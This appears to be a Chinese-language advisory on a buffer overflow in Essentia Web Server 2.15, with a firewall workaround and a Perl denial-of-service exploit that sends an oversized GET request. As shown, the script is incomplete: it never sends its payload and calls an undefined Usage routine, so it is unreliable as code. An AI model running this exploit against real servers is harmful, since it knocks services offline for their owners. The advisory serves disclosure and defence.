发布日期：2006-11-07
更新日期：2006-11-10

受影响系统：

Essen Essentia Web Server 2.15

描述：

---

BUGTRAQ  ID: 20910

Essentia Web Server是微软Windows环境下的多线程HTTP Server，由Essen开发、维护。

Essentia Web Server在处理用户请求时存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞在服务器上执行任意指令。

如果攻击者向服务器发送了超长的（超过6000字节）的GET或HEAD请求的话，就会触发栈溢出，导致执行任意代码。

<*来源：CorryL （corryl80@gmail.com）
  
  链接：http://secunia.com/advisories/22718/
        http://marc.theaimsgroup.com/?l=bugtraq&m=116318188120644&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl


use IO::Socket;

use Getopt::Std; getopts('h:', \%args);



if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "\n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-\n";

print STDERR "-=[ Discovered By CorryL          corryl80@gmail.com ]=-\n";

print STDERR "-=[ Coded by CorryL     info:www.x0n3-h4ck.org ]=-\n\n";

if (!defined($host)) {

Usage();

}

$dos = "A"x6800;

print "[+] Connect to $host\n";

$socket = new IO::Socket::INET (PeerAddr => "$host",

                               PeerPort => 80,

                               Proto => 'tcp');

                               die unless $socket;

print "[+] Sending DOS byte\n";

         $data = "GET /$dos \r\n\r\n";

建议：

---

临时解决方法：

* 在代理或防火墙过滤超长的GET或HEAD请求。

厂商补丁：

Essen
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.essencomp.com/frmbuynow.asp?essentia

浏览次数：3147
严重程度：0（网友投票）